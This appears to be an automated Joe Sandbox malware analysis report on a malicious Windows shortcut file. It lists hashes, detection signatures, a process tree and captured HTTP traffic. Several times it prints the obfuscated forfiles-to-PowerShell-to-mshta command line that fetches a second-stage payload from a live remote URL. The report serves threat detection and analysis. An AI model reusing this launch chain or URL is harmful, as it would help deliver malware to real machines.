Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sbOq2d6k2t.lnk

Overview

General Information

Sample name:sbOq2d6k2t.lnk
renamed because original name is a hash value
Original sample name:806b5269e7aa9c2c82ce247b30a3e92a4f7285b21e2bcf54c8ffad86bd92ea68.lnk
Analysis ID:1543063
MD5:39cf9750a6ddd099525b05015a61078b
SHA1:62baca21ff6d14e887b1a6ba5a247e01a3836664
SHA256:806b5269e7aa9c2c82ce247b30a3e92a4f7285b21e2bcf54c8ffad86bd92ea68
Tags:calendar-stib-com-ualnkuser-JAMESWT_MHT
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • forfiles.exe (PID: 5896 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5 MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1088 cmdline: . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 6500 cmdline: "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 2072 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5, CommandLine: "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1088, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5, ProcessId: 6500, ProcessName: mshta.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5, CommandLine: . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 5896, ParentProcessName: forfiles.exe, ProcessCommandLine: . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5, ProcessId: 1088, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2072, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: sbOq2d6k2t.lnkReversingLabs: Detection: 18%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: unknownHTTPS traffic detected: 185.68.16.189:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: Joe Sandbox ViewASN Name: UKRAINE-ASUA UKRAINE-ASUA
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /programy-nauczania/GTSvitikgasuStage5 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_search.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/checkbox.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /programy-nauczania/GTSvitikgasuStage5 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_search.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/checkbox.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
